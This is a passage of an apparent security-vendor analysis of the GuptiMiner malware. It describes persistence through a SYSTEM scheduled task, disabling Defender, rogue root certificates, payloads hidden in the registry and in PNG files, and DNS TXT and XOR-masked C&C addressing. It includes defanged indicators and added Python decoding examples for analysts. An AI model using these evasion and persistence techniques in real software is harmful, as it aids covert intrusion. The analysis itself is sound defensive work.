  449. <p>The malicious PNG loader is then placed in one (or both) of these locations:<br><code>C:\Program Files (x86)\Brother\Brmfl14c\BrLogAPI.dll<br>C:\Program Files\Brother\Brmfl14c\BrLogAPI.dll&nbsp;</code></p>
  450.  
  451.  
  452.  
  453. <p>The scheduled task is created by invoking the Task Scheduler. The scheduled task has these characteristics:&nbsp;</p>
  454.  
  455.  
  456.  
  457. <ul>
  458. <li>It is created and named as <code>C:\Windows\System32\Tasks\Microsoft\Windows\Brother\Brmfl14c</code>&nbsp;</li>
  459.  
  460.  
  461.  
  462. <li>Executes: <code>C:\ProgramData\Brother\Brmfl14c\BrRemPnP.exe</code>&nbsp;</li>
  463.  
  464.  
  465.  
  466. <li>The execution is done under a folder containing the to-be-sideloaded DLL, e.g.: <code>C:\Program Files (x86)\Brother\Brmfl14c\</code>&nbsp;</li>
  467.  
  468.  
  469.  
  470. <li>The execution is performed with every boot (<code>TASK_TRIGGER_BOOT</code>) with <code>SYSTEM</code> privileges&nbsp;</li>
  471. </ul>
  472.  
  473.  
  474.  
  475. <h3 class="wp-block-heading">Deploy During Shutdown</h3>
  476.  
  477.  
  478.  
  479. <p><em><code>3515113e7127dc41fb34c447f35c143f1b33fd70913034742e44ee7a9dc5cc4c<br>(2021-03-28 14:41:07 UTC)</code></em></p>
  480.  
  481.  
  482.  
  483. <p>Let’s now look at how all these files, clean and malicious, are being deployed. One of GuptiMiner’s tricks is that it drops the final payload, containing the PNG loader stage, only during the system shutdown process. This happens while other applications are shutting down and are potentially no longer protecting the user.</p>
  484.  
  485.  
  486. <div class="wp-block-image">
  487. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-19.png"><img loading="lazy" decoding="async" width="754" height="732" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-19.png" alt="" class="wp-image-8426" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-19.png 754w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-19-300x291.png 300w" sizes="(max-width: 754px) 100vw, 754px" /></a><figcaption class="wp-element-caption"><em>The main flow of the Stage 0.9 variant – drops final payload during system shutdown</em></figcaption></figure></div>
  488.  
  489.  
  490. <p>From the code above, we can observe that the final payload DLL is dropped only when the <code>SM_SHUTTINGDOWN</code> system metric is non-zero (meaning the current session is shutting down) and all the supporting clean files have been dropped successfully.&nbsp;</p>
  491.  
  492.  
  493.  
  494. <p>An attentive reader could also notice in the code above that the first function being called disables Windows Defender. This is done by the standard means of modifying registry keys. Only if Defender is disabled can the malware proceed with its malicious actions.&nbsp;</p>
  495.  
  496.  
  497.  
  498. <h3 class="wp-block-heading">Adding Certificates to Windows</h3>
  499.  
  500.  
  501.  
  502. <p>Most of the time, GuptiMiner uses self-signed binaries for its malicious activities. However, this time around, the attackers went a step further. In this case, both of the dropped PNG loader DLLs are signed with a certificate chaining to a custom root certification authority. This means that the signature is inherently untrusted, since the attackers’ certification authority is not trusted by the common verification processes in Windows.&nbsp;</p>
  503.  
  504.  
  505.  
  506. <p>However, during the malware installation, GuptiMiner also adds a root certificate to Windows’ certificate store, making this certification authority trusted. Thus, when such a signed file is executed, it is treated as correctly signed. This is done using the <code>CertCreateCertificateContext</code>, <code>CertOpenStore</code>, and <code>CertAddCertificateContextToStore</code> API functions.</p>
  507.  
  508.  
  509. <div class="wp-block-image">
  510. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-21.png"><img loading="lazy" decoding="async" width="920" height="501" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-21.png" alt="" class="wp-image-8428" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-21.png 920w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-21-300x163.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-21-768x418.png 768w" sizes="(max-width: 920px) 100vw, 920px" /></a><figcaption class="wp-element-caption"><em>Function which adds GuptiMiner’s root certificate to Windows</em></figcaption></figure></div>
  511.  
  512.  
  513. <p>The certificate is present in a plaintext form directly in the GuptiMiner binary file.</p>
  514.  
  515.  
  516. <div class="wp-block-image">
  517. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-22.png"><img loading="lazy" decoding="async" width="806" height="331" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-22.png" alt="" class="wp-image-8429" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-22.png 806w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-22-300x123.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-22-768x315.png 768w" sizes="(max-width: 806px) 100vw, 806px" /></a><figcaption class="wp-element-caption"><em>A certificate in the plaintext form which is added as root to Windows by the malware</em></figcaption></figure></div>
  518.  
  519.  
  520. <p>During our research, we found three different certificate issuers used during the GuptiMiner operations:&nbsp;</p>
  521.  
  522.  
  523.  
  524. <ul>
  525. <li><code>GTE Class 3 Certificate Authority&nbsp;</code></li>
  526.  
  527.  
  528.  
  529. <li><code>VeriSign Class 3 Code Signing 2010</code>&nbsp;</li>
  530.  
  531.  
  532.  
  533. <li><code>DigiCert Assured ID Code Signing CA&nbsp;</code></li>
  534. </ul>
  535.  
  536.  
  537.  
  538. <p>Note that these names are artificial and any resemblance to legitimate certification authorities shall be considered coincidental.&nbsp;</p>
  539.  
  540.  
  541.  
  542. <h3 class="wp-block-heading" id="storing-payloads-in-registry">Storing Payloads in Registry&nbsp;</h3>
  543.  
  544.  
  545.  
  546. <p><code><em>8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049</em><br><em>(upgradeshow.dll, 2023-11-23 16:41:34 UTC)</em>&nbsp;</code></p>
  547.  
  548.  
  549.  
  550. <p>At later development stages, the authors behind GuptiMiner improved the persistence of their payloads by storing them in registry keys. Furthermore, the payloads are encrypted by XOR with a fixed key, so that they look meaningless to the naked eye.&nbsp;</p>
  551.  
  552.  
  553.  
  554. <p>We’ve discovered these registry key locations to be utilized for storing the payloads so far:&nbsp;</p>
  555.  
  556.  
  557.  
  558. <ul>
  559. <li><code>SYSTEM\CurrentControlSet\Control\Nls\Sorting\Ids\en-US</code>&nbsp;</li>
  560.  
  561.  
  562.  
  563. <li><code>SYSTEM\CurrentControlSet\Control\PnP\Pci\CardList</code>&nbsp;</li>
  564.  
  565.  
  566.  
  567. <li><code>SYSTEM\CurrentControlSet\Control\Wdf\DMCF</code>&nbsp;</li>
  568.  
  569.  
  570.  
  571. <li><code>SYSTEM\CurrentControlSet\Control\StorVSP\Parsers</code>&nbsp;</li>
  572. </ul>
  573.  
  574.  
  575.  
  576. <h2 class="wp-block-heading" id="png-loader">Stage 1 – PNG Loader&nbsp;</h2>
  577.  
  578.  
  579.  
  580. <p><code><em>ff884d4c01fccf08a916f1e7168080a2d740a62a774f18e64f377d23923b0297</em><br><em>(2018-04-19 09:45:25 UTC)</em>&nbsp;</code></p>
  581.  
  582.  
  583.  
  584. <p>When the entry point of the PE file is executed by the shellcode from <a href="#installation-process">Stage 0</a>, the malware first creates a scheduled task that attempts to clean up the initial infection by removing the <code>updll62.dlz</code> archive and the <code>version.dll</code> library from the system.&nbsp;</p>
  585.  
  586.  
  587.  
  588. <p>Furthermore, the PE serves as a dropper for additional stages by contacting the attacker’s malicious DNS server: it sends a DNS request to that server and obtains a TXT record in the response. The TXT response holds an encrypted URL of the real C&amp;C server that should be requested for an additional payload. This payload is a valid PNG image file (a T-Mobile logo) which also holds a shellcode appended to its end. The malware then executes the shellcode in a separate thread, providing further malware functionality as the next stage.</p>
  589.  
  590.  
  591.  
  592. <p>Note that since the DNS server itself is malicious, the requested domain name doesn’t really matter – or, in a more abstract way of thinking about this functionality, it can be rather viewed as a “password” which is passed to the server, deciding whether the DNS server should or shouldn’t provide the desired TXT answer carrying the instructions.&nbsp;</p>
  593.  
  594.  
  595.  
  596. <p>As we already mentioned in the <a href="#domains-in-time">Domains timeline section</a>, there are multiple such “Requested domains” used. In the version referenced here, these two are used:&nbsp;</p>
  597.  
  598.  
  599.  
  600. <ul>
  601. <li><code>ext.peepzo[.]com</code>&nbsp;</li>
  602.  
  603.  
  604.  
  605. <li><code>crl.peepzo[.]com</code>&nbsp;</li>
  606. </ul>
  607.  
  608.  
  609.  
  610. <p>and the malicious DNS server address is in this case:&nbsp;</p>
  611.  
  612.  
  613.  
  614. <ul>
  615. <li><code>ns1.peepzo[.]com</code>&nbsp;</li>
  616. </ul>
  617.  
  618.  
  619.  
  620. <p>Here we can see a captured DNS TXT response using Wireshark. Note that <code>Transaction ID = 0x034b</code> was left unchanged during all the years of GuptiMiner operations. We find this interesting because we would expect this could get easily flagged by firewalls or EDRs in the affected network.</p>
  621.  
  622.  
  623. <div class="wp-block-image">
  624. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24.png"><img loading="lazy" decoding="async" width="1550" height="732" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24.png" alt="" class="wp-image-8433" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24.png 1550w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24-300x142.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24-1024x484.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24-768x363.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24-1536x725.png 1536w" sizes="(max-width: 1550px) 100vw, 1550px" /></a><figcaption class="wp-element-caption"><em>DNS TXT response captured by Wireshark</em></figcaption></figure></div>
  625.  
  626.  
  627. <p>The malware performs these queries at random intervals. The initial request for the DNS TXT record is performed within the first 20 minutes after the PNG loader is executed. The subsequent requests, which serve the malware’s update routine, wait up to 69 hours between attempts.&nbsp;</p>
  628.  
  629.  
  630.  
  631. <p>This update mechanism is reflected by creating separate mutexes with the shellcode version number which is denoted by the first two bytes of the decrypted DNS TXT response (see below for the decryption process). This ensures that no shellcode with the same version is run twice on the system.&nbsp;</p>
  632.  
  633.  
  634. <div class="wp-block-image">
  635. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-25.png"><img loading="lazy" decoding="async" width="770" height="356" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-25.png" alt="" class="wp-image-8435" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-25.png 770w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-25-300x139.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-25-768x355.png 768w" sizes="(max-width: 770px) 100vw, 770px" /></a><figcaption class="wp-element-caption"><em>Mutex is numbered by the shellcode’s version information</em></figcaption></figure></div>
  636.  
  637.  
  638. <h3 class="wp-block-heading" id="dns-txt-decryption">DNS TXT Record Decryption</h3>
  639.  
  640.  
  641.  
  642. <p>After the DNS TXT record is received, GuptiMiner decodes the content using base64 and decrypts it with a combination of MD5 used as a key derivation function and the RC2 cipher for the decryption. Note that in the later versions of this malware, the authors improved the decryption process by also using checksums and additional decryption keys.&nbsp;</p>
  643.  
  644.  
  645.  
  646. <p>For the key derivation function and the decryption process, the authors decided to use standard Windows CryptoAPI functions.</p>
  647.  
  648.  
  649. <div class="wp-block-image">
  650. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-27.png"><img loading="lazy" decoding="async" width="963" height="318" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-27.png" alt="" class="wp-image-8438" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-27.png 963w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-27-300x99.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-27-768x254.png 768w" sizes="(max-width: 963px) 100vw, 963px" /></a><figcaption class="wp-element-caption"><em>Typical use of standard Windows CryptoAPI functions</em></figcaption></figure></div>
  651.  
  652.  
  653. <p>Interestingly, a keen eye can observe an oversight in this initialization process shown above, particularly in the <code>CryptHashData</code> function. The prototype of the <a href="https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-crypthashdata" target="_blank" rel="noreferrer noopener">CryptHashData API function</a> is:</p>
  654.  
  655.  
  656.  
  657. <p><code>BOOL CryptHashData(<br>&nbsp; [in] HCRYPTHASH hHash,<br>&nbsp; [in] const BYTE *pbData,<br>&nbsp; [in] DWORD&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dwDataLen,<br>&nbsp; [in] DWORD&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dwFlags<br>);&nbsp;</code></p>
  658.  
  659.  
  660.  
  661. <p>The second argument of this function is a pointer to an array of bytes whose length is given by <code>dwDataLen</code>. However, this malware passes the string <code>L"POVO@1"</code> in Unicode (UTF-16) form as <code>*pbData</code>, while the <code>dwDataLen</code> it supplies covers only six bytes, not the twelve bytes that the UTF-16 string occupies.</p>
  662.  
  663.  
  664. <div class="wp-block-image">
  665. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-28.png"><img loading="lazy" decoding="async" width="541" height="45" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-28.png" alt="" class="wp-image-8441" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-28.png 541w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-28-300x25.png 300w" sizes="(max-width: 541px) 100vw, 541px" /></a></figure></div>
  666.  
  667.  
  668. <p>Thus, the first six bytes from this array are only <code>db 'P', 0, 'O', 0, 'V', 0</code>, which effectively cuts the key in half and pads it with zeroes. Even though the malware authors changed the decryption key throughout the years, they never fixed this oversight, and it is still present in the latest version of GuptiMiner.&nbsp;</p>
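<p>To make the consequence of this oversight concrete, here is an added example (not code from the article or from the malware) that emulates the <code>CryptHashData</code> contract in Python: the function hashes exactly <code>dwDataLen</code> bytes starting at <code>pbData</code>, so passing the character count of a wide string feeds MD5 only the first half of it. An analyst re-implementing the decryptor must reproduce the truncated input, not the intended key; the helper names below are ours, only the key string <code>L"POVO@1"</code> comes from the article.</p>

```python
import hashlib

# Decryption key string from the article, passed by the malware to
# CryptHashData as a wide (UTF-16) string: L"POVO@1".
WIDE_KEY = "POVO@1"


def crypt_hash_data_input(key: str, dw_data_len: int) -> bytes:
    """Emulate the CryptHashData contract: exactly dw_data_len bytes starting at
    pbData are hashed, no matter how long the wide string behind pbData is."""
    pb_data = key.encode("utf-16-le")  # what L"POVO@1" looks like in memory
    return pb_data[:dw_data_len]


def md5_kdf(material: bytes) -> bytes:
    """MD5 used as the key derivation function, as the article describes."""
    return hashlib.md5(material).digest()


def compare_key_derivations(key: str) -> dict:
    """Return the candidate key materials an analyst might hash, with their MD5s.

    'utf16_truncated' is what the sample actually hashes: the character count
    (6) is passed as dwDataLen, so only the first six of twelve bytes are used.
    A re-implemented decryptor has to reproduce this to get the right RC2 key.
    """
    ascii_key = key.encode("ascii")
    wide_key = key.encode("utf-16-le")
    truncated = crypt_hash_data_input(key, len(key))  # dwDataLen = 6, not 12
    return {
        "ascii": (ascii_key, md5_kdf(ascii_key)),
        "utf16_full": (wide_key, md5_kdf(wide_key)),
        "utf16_truncated": (truncated, md5_kdf(truncated)),
    }


if __name__ == "__main__":
    for name, (material, digest) in compare_key_derivations(WIDE_KEY).items():
        print(f"{name:16} {material!r:34} md5={digest.hex()}")
```

<p>The three digests differ, which is why a decryptor written from the string seen in the binary alone (or from its full UTF-16 form) never produces usable RC2 key material for these samples.</p>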
  669.  
  670.  
  671.  
  672. <h3 class="wp-block-heading">DNS TXT Record Parsing&nbsp;</h3>
  673.  
  674.  
  675.  
  676. <p>At this point, we would like to demonstrate the decrypted TXT record and how to parse it. In this example, while accessing the attacker’s malicious DNS server <code>ns.srnmicro[.]net</code> and the requested domain <code>spf.microsoft[.]com</code>, the server returned this DNS TXT response:&nbsp;</p>
  677.  
  678.  
  679.  
  680. <p><code>VUBw2mOgagCILdD3qWwVMQFPUd0dPHO3MS/CwpL2bVESh9OnF/Pgs6mHPLktvph2</code></p>
  681.  
  682.  
  683.  
  684. <p>After fully decoding and decrypting this string, we get:&nbsp;</p>
  685.  
  686.  
  687.  
  688. <figure class="wp-block-image size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-29.png"><img loading="lazy" decoding="async" width="850" height="72" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-29.png" alt="" class="wp-image-8443" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-29.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-29-300x25.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-29-768x65.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a></figure>
  689.  
  690.  
  691.  
  692. <p>This result contains multiple fields and can be interpreted as:&nbsp;</p>
  693.  
  694.  
  695.  
  696. <figure class="wp-block-table"><table><tbody><tr><td><strong>Name&nbsp;</strong></td><td><strong>Value&nbsp;</strong></td></tr><tr><td>Version 1&nbsp;</td><td>1&nbsp;</td></tr><tr><td>Version 2&nbsp;</td><td>5&nbsp;</td></tr><tr><td>Key size&nbsp;</td><td><code>\r</code> (= <code>0xD</code>)&nbsp;</td></tr><tr><td>Key&nbsp;</td><td>Microsoft.com&nbsp;</td></tr><tr><td>C&amp;C URL&nbsp;</td><td>http://www.deanmiller[.]net/m/&nbsp;</td></tr><tr><td>Checksum&nbsp;</td><td><code>\xde</code></td></tr></tbody></table></figure>
  697.  
  698.  
  699.  
  700. <p>The first two bytes, Version 1 and Version 2, form the PNG shellcode version. It is not clear why there are two such versions, since Version 2 is actually never used in the program. Only Version 1 is considered when deciding whether to perform the update – i.e., whether to download and load the PNG shellcode or not. In either case, we could look at these numbers as a major version and a minor version, where only the major releases serve as a trigger for the update process.</p>
  701.  
  702.  
  703.  
  704. <p>The third byte is a key size that denotes how many bytes should be read afterwards, forming the key. Furthermore, no additional delimiter is needed between the key and the URL since the key size is known and the URL follows. Finally, the two-byte checksum can be verified by calculating a sum of all the bytes (modulo <code>0xFF</code>).&nbsp;</p>
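<p>The layout just described is simple enough to parse mechanically once the record has been decrypted. The following is an added example (not the article's or the malware's code) of such a parser in Python, with a matching builder used only to construct test data. The record it constructs mirrors the table above (versions 1 and 5, key size <code>0x0D</code>, key <code>Microsoft.com</code>) but uses a placeholder URL instead of the observed one, and the checksum interpretation (sum of all preceding bytes, modulo <code>0xFF</code>, stored in one trailing byte) is our reading of the description, not a confirmed detail.</p>

```python
from dataclasses import dataclass


@dataclass
class TxtRecord:
    version_major: int   # "Version 1": the only byte the update check uses
    version_minor: int   # "Version 2": never used by the loader
    key: bytes           # RC2 key material for the PNG-appended shellcode
    cc_url: str          # C&C URL the PNG is fetched from
    checksum: int
    checksum_ok: bool


def record_checksum(body: bytes) -> int:
    """Checksum over every byte preceding the checksum itself.

    The article says "a sum of all the bytes (modulo 0xFF)"; reading that as
    sum(body) % 0xFF stored in a single trailing byte is an assumption."""
    return sum(body) % 0xFF


def parse_txt_record(blob: bytes) -> TxtRecord:
    """Parse the decrypted TXT payload: v1, v2, key_size, key, URL, checksum."""
    if len(blob) < 5:
        raise ValueError("record too short")
    v1, v2, key_size = blob[0], blob[1], blob[2]
    key_end = 3 + key_size
    if key_end >= len(blob) - 1:      # need at least one URL byte plus checksum
        raise ValueError("key size runs past the end of the record")
    key = blob[3:key_end]
    url = blob[key_end:-1]            # no delimiter: the URL runs up to the checksum
    checksum = blob[-1]
    return TxtRecord(v1, v2, key, url.decode("ascii", errors="replace"),
                     checksum, record_checksum(blob[:-1]) == checksum)


def build_txt_record(v1: int, v2: int, key: bytes, url: str) -> bytes:
    """Inverse of parse_txt_record, used here only to construct sample data."""
    body = bytes([v1, v2, len(key)]) + key + url.encode("ascii")
    return body + bytes([record_checksum(body)])


def needs_update(record: TxtRecord, current_major: int) -> bool:
    """Only the major version decides whether the PNG shellcode is fetched."""
    return record.version_major > current_major


# Constructed record mirroring the article's table: versions 1 and 5, key size
# 0x0D, key "Microsoft.com"; the URL is a placeholder, not the observed one.
SAMPLE_RECORD = build_txt_record(1, 5, b"Microsoft.com",
                                 "http://c2.example.invalid/m/")

if __name__ == "__main__":
    print(parse_txt_record(SAMPLE_RECORD))
```

<p>Because the key size is explicit and the checksum is the last byte, the URL needs no terminator; a record whose key size points past the end is rejected rather than yielding an empty URL.</p>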
  705.  
  706.  
  707.  
  708. <p>After the DNS TXT record is decoded and decrypted, the malware downloads the next stage, from the provided URL, in the form of a PNG file. This is done by using standard <code>WinINet</code> Windows API, where the <code>User-Agent</code> is set to contain the bitness of the currently running process.</p>
  709.  
  710.  
  711. <div class="wp-block-image">
  712. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-30.png"><img loading="lazy" decoding="async" width="869" height="333" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-30.png" alt="" class="wp-image-8446" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-30.png 869w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-30-300x115.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-30-768x294.png 768w" sizes="(max-width: 869px) 100vw, 869px" /></a><figcaption class="wp-element-caption"><em>The malware communicates the bitness of the running process to the C&amp;C</em></figcaption></figure></div>
  713.  
  714.  
  715. <p>The C&amp;C server uses the <code>User-Agent</code> information for two things:&nbsp;</p>
  716.  
  717.  
  718.  
  719. <ul>
  720. <li>Provides the next stage (a shellcode) in the correct bitness&nbsp;</li>
  721.  
  722.  
  723.  
  724. <li>Filters any HTTP request that doesn’t contain this information as a protection mechanism&nbsp;</li>
  725. </ul>
  726.  
  727.  
  728.  
  729. <h3 class="wp-block-heading" id="parsing-the-png-file">Parsing the PNG File&nbsp;</h3>
  730.  
  731.  
  732.  
  733. <p>The downloaded file is a valid PNG file which also contains a shellcode appended at the end. The image is a T-Mobile logo and has exactly <code>805</code> bytes. These bytes are skipped by the malware, and the rest of the file, starting at offset <code>0x325</code>, is decrypted by RC2 using the key provided in the TXT response (derived using MD5). The reason for using an image as this “prefix” is to further obfuscate the network communication: the payload looks like a legitimate image, so the appended malware code is likely to be overlooked.&nbsp;</p>
  734.  
  735.  
  736. <div class="wp-block-image">
  737. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-31.png"><img loading="lazy" decoding="async" width="549" height="625" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-31.png" alt="" class="wp-image-8447" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-31.png 549w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-31-264x300.png 264w" sizes="(max-width: 549px) 100vw, 549px" /></a><figcaption class="wp-element-caption"><em>PNG file containing the shellcode starting at <code>0x325</code></em></figcaption></figure></div>
  738.  
  739.  
  740. <p>After the shellcode is loaded from position <code>0x325</code>, it proceeds by loading an additional PE loader from memory, which unpacks the next stages using Gzip.&nbsp;</p>
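<p>An image with data appended after its last chunk is easy to spot structurally, which is useful both for triaging captured downloads and for carving the encrypted blob for offline analysis. The following added example (ours, not the article's or the malware's code) walks the PNG chunk list, verifies each chunk CRC, and returns whatever follows the <code>IEND</code> chunk as the overlay. It constructs a 1x1 PNG as a stand-in for the logo and appends marker bytes; the real samples had the overlay start at <code>0x325</code>, but the offset is computed, not assumed.</p>

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_minimal_png() -> bytes:
    """Constructed 1x1 8-bit grayscale PNG used as a stand-in for the logo."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    scanline = b"\x00\x00"  # filter type 0 followed by one gray pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline)) + _chunk(b"IEND", b""))


def png_end_offset(data: bytes) -> int:
    """Walk the chunk list and return the offset just past IEND's CRC.

    Chunk CRCs are verified on the way, so a corrupted or fabricated chunk
    header raises instead of yielding a bogus overlay offset."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("missing PNG signature")
    off = len(PNG_SIGNATURE)
    while off + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[off:off + 8])
        end = off + 12 + length
        if end > len(data):
            raise ValueError(f"truncated {ctype!r} chunk at {off:#x}")
        body = data[off + 8:off + 8 + length]
        (crc,) = struct.unpack(">I", data[off + 8 + length:end])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk at {off:#x}")
        off = end
        if ctype == b"IEND":
            return off
    raise ValueError("no IEND chunk found")


def carve_overlay(data: bytes):
    """Return (overlay_offset, overlay_bytes); the overlay is empty for a clean PNG."""
    end = png_end_offset(data)
    return end, data[end:]


# Constructed sample: a clean PNG followed by marker bytes standing in for the
# appended, RC2-encrypted shellcode described in the article.
SAMPLE_OVERLAY = b"CONSTRUCTED-OVERLAY-NOT-SHELLCODE"
SAMPLE_FILE = build_minimal_png() + SAMPLE_OVERLAY

if __name__ == "__main__":
    offset, overlay = carve_overlay(SAMPLE_FILE)
    print(f"image ends at {offset:#x}, overlay is {len(overlay)} bytes")
```

<p>Image viewers stop at <code>IEND</code>, which is exactly why the trailing data goes unnoticed; a proxy or sandbox rule that flags PNG responses with a non-empty overlay catches this pattern regardless of the encryption used on the payload.</p>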
  741.  
  742.  
  743.  
  744. <h3 class="wp-block-heading">IP Address Masking</h3>
  745.  
  746.  
  747.  
  748. <p><code><em>294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a</em><br><em>(2023-11-09 14:19:45 UTC)</em>&nbsp;</code></p>
  749.  
  750.  
  751.  
  752. <p>In late 2023, the authors decided to ditch the years-long approach of using DNS TXT records for distributing payloads and they switched to IP address masking instead.&nbsp;</p>
  753.  
  754.  
  755.  
  756. <p>This new approach consists of a few steps:&nbsp;</p>
  757.  
  758.  
  759.  
  760. <ol start="1">
  761. <li>Obtain an IP address of a hardcoded server name registered to the attacker using the standard <code>gethostbyname</code> API function&nbsp;</li>
  762.  
  763.  
  764.  
  765. <li>For that server, two IP addresses are returned – the first is an IP address which is a masked address, and the second one denotes an available payload version and starts with <code>23.195.</code> as the first two octets&nbsp;</li>
  766.  
  767.  
  768.  
  769. <li>If the version is newer than the current one, the masked IP address is de-masked and results in a real C&amp;C IP address&nbsp;</li>
  770.  
  771.  
  772.  
  773. <li>The real C&amp;C IP address is used along with a hardcoded constant string (used in a URL path) to download the PNG file containing the shellcode&nbsp;</li>
  774. </ol>
  775.  
  776.  
  777.  
  778. <p>The de-masking process is done by XORing each octet of the IP address by <code>0xA</code>, <code>0xB</code>, <code>0xC</code>, <code>0xD</code>, respectively. The result is then taken, and a hardcoded constant string is added to the URL path.&nbsp;</p>
  779.  
  780.  
  781.  
  782. <p>As an example, one such server we observed was <code>www.elimpacific[.]net</code>. It was, at the time, returning:&nbsp;</p>
  783.  
  784.  
  785. <div class="wp-block-image">
  786. <figure class="aligncenter size-full is-resized"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-32.png"><img loading="lazy" decoding="async" width="487" height="197" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-32.png" alt="" class="wp-image-8452" style="width:487px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-32.png 487w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-32-300x121.png 300w" sizes="(max-width: 487px) 100vw, 487px" /></a></figure></div>
  787.  
  788.  
  789. <p>The address <code>23.195.101[.]1</code> denotes a version, and if it is greater than the current version, the malware performs the update by downloading the PNG file with the shellcode. This update is downloaded by requesting a PNG file from the real C&amp;C server, whose address is calculated by de-masking the <code>179.38.204[.]38</code> address:&nbsp;</p>
  790.  
  791.  
  792. <div class="wp-block-image">
  793. <figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-33.png"><img loading="lazy" decoding="async" width="850" height="72" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-33.png" alt="" class="wp-image-8453" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-33.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-33-300x25.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-33-768x65.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a></figure></div>
  794.  
  795.  
  796. <p>The request is then made, along with the calculated IP address <code>185.45.192[.]43</code> and a hardcoded constant <code>elimp</code>. Using a constant like this serves as an additional password, in a sense:<br><code>185.45.192[.]43/elimp/</code>&nbsp;</p>
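<p>For an analyst, the value of knowing this scheme is being able to turn a pair of observed A records into the real C&amp;C address that should be blocked. The following added example (ours, not code from the article or the malware) does exactly that for the case above: it reproduces the per-octet XOR with <code>0xA</code>, <code>0xB</code>, <code>0xC</code>, <code>0xD</code> and recovers <code>185.45.192.43</code> from <code>179.38.204[.]38</code>. How the two trailing octets of the <code>23.195.x.y</code> record are compared as a version is not stated in the article; treating them as a (major, minor) pair is our assumption, as are the function names.</p>

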